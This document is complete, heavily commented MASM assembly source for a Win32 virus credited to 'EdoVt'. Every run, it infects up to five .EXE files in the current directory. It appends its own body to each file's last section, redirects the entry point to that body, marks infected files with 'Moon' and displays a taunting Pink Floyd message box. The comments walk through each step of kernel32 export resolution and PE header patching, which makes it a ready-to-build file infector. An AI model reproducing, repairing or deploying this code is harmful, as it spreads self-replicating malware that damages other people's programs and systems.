Win32 Virus
A small Win32 PE file infector: it infects up to five .EXE files in the current directory per run by appending its own body to each file's last section and redirecting the entry point to it.
Assembler: MASM (uses the MASM32 include/lib paths).
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
VirusSize equ (offset VirusEnd - offset VirusStart) ; byte length of the body that is copied into a victim (VirusStart..VirusEnd)
.data
; These strings live in .data, outside VirusStart..VirusEnd, so they are only
; available to the first generation (@1stGen) and are never carried into victims.
OurTitle db "Message",0                   ; MessageBoxA caption for the first generation
OurMessage db "This Is [Win32] Virus",10  ; MessageBoxA text for the first generation
db " by EdoVt",0
.code
; Entry point of the body. It runs in two situations:
;   - first generation: as the original carrier program (delta == 0, ebp == 0)
;   - inside an infected host, after Infection has written it to the host's
;     last section and pointed AddressOfEntryPoint at it (delta != 0)
; Everything between VirusStart and VirusEnd is position independent: every
; data reference is [ebp+symbol], where ebp = runtime address - link address.
; Registers are preserved for the host by pushad/pushfd .. popfd/popad.
VirusStart label byte
start:
nop
nop
pushad                      ; preserve all registers and flags for the host
pushfd
call delta                  ; delta trick: push the runtime address of 'delta'
delta:
pop ebp
sub ebp,offset delta        ; ebp = runtime address - link address (0 in the first generation)
mov eax,[esp+24h]           ; pushad (32) + pushfd (4) = 24h bytes: this is the return address that was on the
                            ; stack at entry, assumed to lie inside kernel32.dll (the loader's call to the
                            ; entry point). NOTE(review): this only holds on Windows versions where the entry
                            ; point is called from kernel32; nothing here verifies it, and FuckTheK32 walks
                            ; backwards from this address with no lower bound.
call FuckTheK32             ; find the module containing eax and record its export tables
call GetAPIz                ; resolve the OurAPIz names into the OurFuncz address table
call Infect                 ; infect up to 5 *.EXE files in the current directory
or ebp,ebp
jz @1stGen                  ; delta == 0: we are the carrier program, take the first-generation exit
; Running inside an infected host. user32.dll is loaded and MessageBoxA resolved
; by hand with the kernel32 functions found above (presumably because the host
; cannot be assumed to import user32).
lea eax,[USER32DLL+ebp]
push eax
call [ebp+_LoadLibraryA]    ; eax = HMODULE of user32.dll
lea ecx,[MESSAGEBOX+ebp]
push ecx
push eax
call [ebp+_GetProcAddress]  ; eax = address of MessageBoxA
xor ebx,ebx
push ebx                    ; uType = 0
lea ecx,[MesTitle+ebp]
push ecx                    ; lpCaption = MesTitle
lea ecx,[Mess+ebp]
push ecx                    ; lpText = Mess
push ebx                    ; hWnd = NULL
call eax                    ; MessageBoxA(NULL, Mess, MesTitle, 0)
popfd
popad                       ; restore the host's registers and flags
; Return to the host's original entry point. The two immediates below are
; overlaid by named dwords (org $-4) so that Infection can store the victim's
; ImageBase and AddressOfEntryPoint into them before it copies the body.
mov eax,12345678h
org $-4
ImageBase dd 400000h        ; victim's OptionalHeader.ImageBase (400000h for the carrier itself)
add eax,12345678h
org $-4
EntryPoint dd 1000h         ; victim's OptionalHeader.AddressOfEntryPoint (an RVA)
jmp eax                     ; eax = ImageBase + EntryPoint: continue with the host
; Not reached after the jmp. This goes through the carrier's import thunk,
; which is only meaningful in the first generation anyway.
push 0
call ExitProcess
; Infect: enumerate *.EXE in the current directory (SearchMask) and call
; Infection on each match, stopping after 5 infections (Infections) or when
; FindNextFileA reports no more files.
; In:  ebp = delta; OurFuncz resolved
; Clobbers: eax, ecx, edi, flags, Infections, SearchHandle, @WinFindData
Infect:
and [ebp+Infections],00000000h    ; Infections = 0 (byte variable)
lea eax,[@WinFindData+ebp]
push eax                          ; lpFindFileData
lea eax,[SearchMask+ebp]
push eax                          ; lpFileName = "*.EXE"
call [ebp+_FindFirstFileA]
inc eax                           ; INVALID_HANDLE_VALUE (-1) + 1 == 0
or eax,eax
jz FailInfect                     ; nothing matched / error
dec eax                           ; back to the real search handle
mov [ebp+SearchHandle],eax
InfectIt:
push [ebp+EntryPoint]             ; Infection overwrites ImageBase/EntryPoint with the victim's values
push [ebp+ImageBase]              ; (they travel inside the copied body), so save our own across the call
call Infection
pop [ebp+ImageBase]
pop [ebp+EntryPoint]
inc [ebp+Infections]              ; Infection decrements this again on its NoInfect path, so only real infections count
cmp [ebp+Infections],5
jz CloseSearchHandle              ; per-run cap of 5 infected files
nop
lea edi,[@WinFindData.cFileName+ebp]
mov ecx,MAX_PATH
xor al,al
rep stosb                         ; clear cFileName before the next FindNextFileA
lea eax,[ebp+@WinFindData]
push eax
push dword ptr [ebp+SearchHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz InfectIt                      ; another match: loop
CloseSearchHandle:
push [ebp+SearchHandle]
call [ebp+_FindClose]
FailInfect:
ret
; Infection: append the body to the last section of the file named in
; @WinFindData.cFileName and redirect AddressOfEntryPoint to it.
; Steps: clear the file attributes, open, map, check the "PE" signature and the
; "Moon" marker, unmap and remap at the enlarged size, patch the optional header
; and last section header, copy VirusSize bytes from the running image, unmap,
; close, restore the attributes.
; In:  ebp = delta; @WinFindData filled by FindFirst/NextFileA
; Side effects: overwrites ImageBase/EntryPoint with the victim's values (the
;   caller saves and restores them); writes OurEntryPoint; on the NoInfect path
;   decrements Infections (word-sized, see below).
; Clobbers: eax, ebx, ecx, edx, esi, edi, flags, FileHandle, MapHandle, MapAddress, NewSize
; No validation beyond the two signature checks: e_lfanew, NumberOfSections,
; alignments and section fields are trusted as read from the file, and the body
; is written at PointerToRawData+SizeOfRawData of the last section, which
; assumes the last section ends at end of file (anything after it would be
; overwritten).
Infection:
lea esi,dword ptr[ebp+@WinFindData.cFileName]
push 80h                           ; FILE_ATTRIBUTE_NORMAL: drop read-only etc. so the file can be opened for write
push esi
call [ebp+_SetFileAttributesA]
call @OpenFile                     ; CreateFileA(esi, GENERIC_READ|GENERIC_WRITE, ...)
inc eax
or eax,eax                         ; INVALID_HANDLE_VALUE (-1) check via the +1 trick
jz CantOpen
dec eax                            ; eax = file handle
mov [ebp+FileHandle],eax
xor ecx,ecx                        ; ecx = 0: mapping size = current file size
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+@WinFindData.nFileSizeLow]
call MapFile                       ; view covering the whole file (low 32 bits of the size)
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]                  ; e_lfanew
add esi,eax                        ; esi = IMAGE_NT_HEADERS (no check that e_lfanew is inside the view)
mov eax,esi
cmp word ptr[eax],'EP'             ; "PE" signature (the MASM char constant is byte-reversed)
jnz NoInfect
cmp dword ptr [eax-04h],'nooM'     ; "Moon" in the 4 bytes before the signature = already infected
jz NoInfect
push dword ptr [eax+3ch]           ; OptionalHeader.FileAlignment, kept across the remap
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]            ; the first mapping only served to validate; remap larger below
pop ecx                            ; ecx = FileAlignment
mov eax,[ebp+@WinFindData.nFileSizeLow]
add eax,VirusSize
call @@Align                       ; NewSize = align_up(file size + VirusSize, FileAlignment)
mov [ebp+NewSize],eax
xchg ecx,eax                       ; ecx = NewSize: CreateMap with this maximum size extends the file
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+NewSize]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax                        ; esi = IMAGE_NT_HEADERS in the new view
mov edi,esi                        ; edi = NT headers for the rest of the routine
add esi,78h                        ; NT headers + 78h = OptionalHeader.DataDirectory[0]
mov edx,[edi+74h]                  ; OptionalHeader.NumberOfRvaAndSizes
shl edx,3                          ; * sizeof(IMAGE_DATA_DIRECTORY)
add esi,edx                        ; esi = first IMAGE_SECTION_HEADER
movzx eax,word ptr [edi+06h]       ; FileHeader.NumberOfSections
dec eax
imul eax,eax,28h                   ; * sizeof(IMAGE_SECTION_HEADER)
add esi,eax                        ; esi = last section header (the one that gets extended)
mov eax,dword ptr[edi+28h]         ; OptionalHeader.AddressOfEntryPoint
mov dword ptr[ebp+EntryPoint],eax  ; stored in the body so the copy can jump back to this host
mov eax,dword ptr[edi+34h]         ; OptionalHeader.ImageBase
mov dword ptr[ebp+ImageBase],eax
mov edx,dword ptr[esi+10h]         ; last section SizeOfRawData
mov ebx,edx
add edx,dword ptr[esi+14h]         ; + PointerToRawData = file offset where the body is written
push edx
mov eax,dword ptr[esi+0ch]         ; last section VirtualAddress
add eax,ebx                        ; + old SizeOfRawData = RVA of the appended body = new entry point
mov dword ptr [ebp+OurEntryPoint],eax ; (written here, never read anywhere in this file)
mov dword ptr[edi+28h],eax         ; redirect AddressOfEntryPoint to the body
mov eax,dword ptr[esi+10h]
add eax,VirusSize
push eax                           ; old SizeOfRawData + VirusSize, reused for VirtualSize below
mov ecx,[edi+3ch]                  ; FileAlignment
call @@Align
mov dword ptr[esi+10h],eax         ; new SizeOfRawData
mov ecx,[edi+038h]                 ; SectionAlignment
pop eax
call @@Align
shl eax,1                          ; VirtualSize is doubled - presumably to leave zero-filled room for the
                                   ; variables after VirusEnd, which are not copied; verify
mov dword ptr[esi+08h],eax         ; new Misc.VirtualSize
pop edx                            ; edx = PointerToRawData + old SizeOfRawData
add eax,dword ptr[esi+0Ch]
mov dword ptr[edi+50h],eax         ; SizeOfImage = last section VirtualAddress + new VirtualSize
or dword ptr [esi+24h],0A0000020h  ; Characteristics |= MEM_WRITE | MEM_EXECUTE | CNT_CODE (the body writes its own variables)
mov dword ptr [edi-04h],"nooM"     ; "Moon" infection marker in the 4 bytes before the PE signature
lea esi,[ebp+start]                ; source: the running body (ImageBase/EntryPoint already hold the victim's values)
mov edi,edx
add edi,[ebp+MapAddress]           ; destination: end of the last section's raw data
mov ecx,VirusSize
rep movsb
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
jmp CloseMap
NoInfect:
dec word ptr [ebp+Infections]      ; cancels the inc the caller does after we return. NOTE: Infections is a
                                   ; byte; this word-sized decrement borrows into the next byte (low byte of
                                   ; OurEntryPoint) when Infections is 0 - harmless only because OurEntryPoint is never read
CloseMap:
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
CloseFile:
push dword ptr [ebp+FileHandle]
call [ebp+_CloseHandle]
CantOpen:
push dword ptr [ebp+@WinFindData.dwFileAttributes] ; restore the attributes cleared at the top
lea eax,[ebp+@WinFindData.cFileName]
push eax
call [ebp+_SetFileAttributesA]
ret
; @@Align: round eax up to the next multiple of ecx.
; In:  eax = value, ecx = alignment (must be non-zero: div faults on 0,
;      and the callers pass FileAlignment/SectionAlignment read from the file unchecked)
; Out: eax = aligned value
; Clobbers: edx (remainder), ecx (becomes the padding added), flags
@@Align proc
xor edx,edx              ; edx:eax / ecx
push eax
div ecx                  ; edx = eax mod ecx (quotient unused)
pop eax                  ; restore the original value
or edx,edx
jz Enough                ; already aligned
sub ecx,edx              ; ecx = alignment - remainder = padding needed
add eax,ecx
Enough: ret
@@Align endp
; MapFile: MapViewOfFile(MapHandle, FILE_MAP_WRITE, 0, 0, ecx)
; In:  ecx = number of bytes to map from offset 0; MapHandle set
; Out: eax = view base address, or 0 on failure
MapFile proc
xor eax,eax
push ecx                 ; dwNumberOfBytesToMap
push eax                 ; dwFileOffsetLow = 0
push eax                 ; dwFileOffsetHigh = 0
push 02h                 ; FILE_MAP_WRITE
push [ebp+MapHandle]
call [ebp+_MapViewOfFile]
ret
MapFile endp
; CreateMap: CreateFileMappingA(FileHandle, NULL, PAGE_READWRITE, 0, ecx, NULL)
; In:  ecx = dwMaximumSizeLow (callers pass 0 for the current file size, then
;      NewSize to extend the file); FileHandle set
; Out: eax = mapping handle, or 0 on failure
CreateMap proc
xor eax,eax
push eax                 ; lpName = NULL
push ecx                 ; dwMaximumSizeLow
push eax                 ; dwMaximumSizeHigh = 0
push 04h                 ; PAGE_READWRITE
push eax                 ; lpFileMappingAttributes = NULL
push [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
; @OpenFile: CreateFileA(esi, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)
; In:  esi = pointer to the NUL-terminated file name
; Out: eax = file handle, or INVALID_HANDLE_VALUE (-1) on failure
@OpenFile proc
xor eax,eax
push eax                 ; hTemplateFile = NULL
push eax                 ; dwFlagsAndAttributes = 0
push 03h                 ; OPEN_EXISTING
push eax                 ; lpSecurityAttributes = NULL
push 01h                 ; FILE_SHARE_READ
push 80000000h or 40000000h ; GENERIC_READ | GENERIC_WRITE
push esi                 ; lpFileName
call [ebp+_CreateFileA]
ret
@OpenFile endp
; FuckTheK32: starting from an address assumed to be inside kernel32.dll, scan
; backwards for the module's "MZ" header and record its export tables.
; In:  eax = an address inside the module (the entry-point return address)
; Out: Kernel_MZ (image base), Kernel_PE (IMAGE_NT_HEADERS), ExpAddrTableVA,
;      ExpNameTableVA, ExpOrdinalTableVA (absolute addresses)
; Clobbers: eax, esi, flags; clears DF
; The backward byte scan has no lower bound and matches the first "MZ" byte pair
; it meets, so a stray "MZ" inside the module data is accepted if the "PE" check
; below happens to pass, and an eax outside any mapped image walks into unmapped
; memory and faults. Nothing verifies that the module found is kernel32.dll.
FuckTheK32 proc
@loop:
cmp word ptr [eax],"ZM"    ; "MZ" (the MASM char constant is byte-reversed)
jz WeGotK32MZ
dec eax                    ; step back one byte at a time
jmp @loop
WeGotK32MZ:
mov [Kernel_MZ+ebp],eax
add eax,3ch
mov eax,[eax]              ; e_lfanew
add eax,[ebp+Kernel_MZ]    ; eax = IMAGE_NT_HEADERS
cmp word ptr [eax],"EP"    ; "PE" signature
jz WeGotK32
; Not a PE image: give up. ExitProcess is reached through the carrier's import
; thunk, which is only valid in the first generation.
push 0
call ExitProcess
WeGotK32:
cld                        ; the lodsd below must move forward
mov [Kernel_PE+ebp],eax
mov esi,eax
add esi,78h                ; NT headers + 78h = DataDirectory[0] (export) .VirtualAddress
lodsd
add eax,[Kernel_MZ+ebp]    ; eax = IMAGE_EXPORT_DIRECTORY
mov esi,eax
add esi,1ch                ; -> AddressOfFunctions (RVA)
lodsd
add eax,[Kernel_MZ+ebp]
mov [ExpAddrTableVA+ebp],eax
lodsd                      ; -> AddressOfNames (offset 20h)
add eax,[Kernel_MZ+ebp]
mov [ExpNameTableVA+ebp],eax
lodsd                      ; -> AddressOfNameOrdinals (offset 24h)
add eax,[Kernel_MZ+ebp]
mov [ExpOrdinalTableVA+ebp],eax
ret
FuckTheK32 endp
; GetAPIz: resolve every NUL-terminated name in OurAPIz to its address in the
; module found by FuckTheK32 and store the results, in order, into OurFuncz.
; Per name: walk AddressOfNames comparing the whole string including its NUL
; (repe cmpsb, so matches are exact); on a hit, index AddressOfNameOrdinals with
; the entry number (Counter), then AddressOfFunctions with that ordinal.
; The name list is terminated by the bytes "Verj".
; In:  ebp = delta; Kernel_MZ and the three Exp*TableVA values set
; Out: OurFuncz[i] = absolute address of OurAPIz[i]
; Clobbers: eax, ebx, ecx, edx, esi, edi, Counter, flags; clears DF
; There is no bound against NumberOfNames: a name that the module does not
; export keeps scanning past the end of the table. The resolved RVA is simply
; added to the base, so a forwarded export would yield a bogus address.
GetAPIz proc
cld
lea ebx,[OurAPIz+ebp]      ; ebx = current wanted name
lea edi,[OurFuncz+ebp]     ; edi = next output slot
begin:
push edi                   ; save the output slot; edi is reused by cmpsb below
mov [Counter+ebp],0        ; entry index into AddressOfNames (word)
xor ecx,ecx
mov esi,ebx
@_1: lodsb                 ; ecx = strlen(name) + 1
inc ecx
or al,al
jnz @_1
mov edx,ecx                ; edx keeps the length; ecx is reloaded before each compare
mov edi,ebx
mov esi,[ExpNameTableVA+ebp]
push esi                   ; [esp] = current AddressOfNames entry
@_2:lodsd                  ; eax = RVA of this export's name string
mov esi,eax
add esi,[Kernel_MZ+ebp]
repe cmpsb                 ; compare ecx bytes of the export name with the wanted name
jz TheyAreEqual
pop esi
add esi,4                  ; next AddressOfNames entry
push esi
mov edi,ebx
mov ecx,edx
inc word ptr [Counter+ebp]
jmp @_2
TheyAreEqual:
pop esi                    ; discard the saved table pointer
pop edi                    ; edi = output slot
xor esi,esi
add ebx,edx                ; ebx = next wanted name
xor eax,eax
mov si,[Counter+ebp]
shl esi,1                  ; ordinals are 16-bit
add esi,[ExpOrdinalTableVA+ebp]
lodsw                      ; ax = ordinal = index into AddressOfFunctions
mov esi,eax
shl esi,2
add esi,[ExpAddrTableVA+ebp]
lodsd                      ; eax = function RVA
add eax,[Kernel_MZ+ebp]
stosd                      ; OurFuncz[i] = address; edi advances to the next slot
cmp dword ptr [ebx],"jreV" ; "Verj" terminates the list
jnz begin
ret
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
; Variables and strings of the body. Everything up to VirusEnd is copied into a
; victim (VirusSize bytes); everything after VirusEnd is not copied and is
; presumably meant to land in the zero-filled tail of the extended section.
Infections db 0                ; infections done in this run (byte; Infection's NoInfect path decrements it as a word)
OurEntryPoint dd 1000h         ; RVA given to the body in the last victim; written by Infection, never read
Counter dw 0                   ; AddressOfNames index used by GetAPIz
USER32DLL db "user32.dll",0    ; LoadLibraryA argument (infected hosts only)
MESSAGEBOX db "MessageBoxA",0  ; GetProcAddress argument (infected hosts only)
MesTitle db "Got Ya !!!!!!!!!!!!!",0 ; MessageBoxA caption shown by infected hosts
Mess db "Everything under the sun is in tune,",10 ; MessageBoxA text shown by infected hosts
db "But the sun is eclipsed by the MOON.",10
db " Pink Floyd",10,10
db "This File Is Infected By ",0
SearchMask db '*.EXE',0        ; FindFirstFileA pattern: current directory only
OurAPIz label byte             ; NUL-separated export names, same order as the OurFuncz slots below
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CloseHandle db "CloseHandle",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0      ; resolved but never called
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0          ; resolved but never called
@LoadLibraryA db "LoadLibraryA",0
@GetProcAddress db "GetProcAddress",0
db "Verj",0                    ; list terminator checked by GetAPIz
VirusEnd label byte            ; end of the copied body (VirusSize = VirusEnd - VirusStart)
OurFuncz label byte            ; resolved API addresses, filled by GetAPIz in list order
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_CloseHandle dd 0
_CreateFileA dd 0
_SetFilePointer dd 0           ; unused
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetEndOfFile dd 0             ; unused
_LoadLibraryA dd 0
_GetProcAddress dd 0
@WinFindData WIN32_FIND_DATA <> ; FindFirst/NextFileA result; cFileName names the current victim
SearchHandle dd ?              ; FindFirstFileA handle
FileHandle dd ?                ; CreateFileA handle of the current victim
MapHandle dd ?                 ; CreateFileMappingA handle
MapAddress dd ?                ; MapViewOfFile base
NewSize dd ?                   ; victim's file size after infection (aligned)
OurDelta dd ?                  ; unused
HostStart dd ?                 ; unused
Kernel_MZ dd ?                 ; base of the module found by FuckTheK32
Kernel_PE dd ?                 ; its IMAGE_NT_HEADERS
ExpAddrTableVA dd ?            ; its AddressOfFunctions (absolute)
ExpNameTableVA dd ?            ; its AddressOfNames (absolute)
ExpOrdinalTableVA dd ?         ; its AddressOfNameOrdinals (absolute)
; First-generation exit (delta == 0): we are the carrier program itself, so
; there is no host to return to. Infect has already run. The banner is shown
; through the carrier's own import table (absolute 'offset' addresses and
; import thunks, valid only at delta 0) and the process exits.
@1stGen:
popfd
popad
xor eax,eax
push eax                   ; uType = 0
push offset OurTitle       ; lpCaption
push offset OurMessage     ; lpText
push eax                   ; hWnd = NULL
call MessageBoxA
push 0
call ExitProcess
end start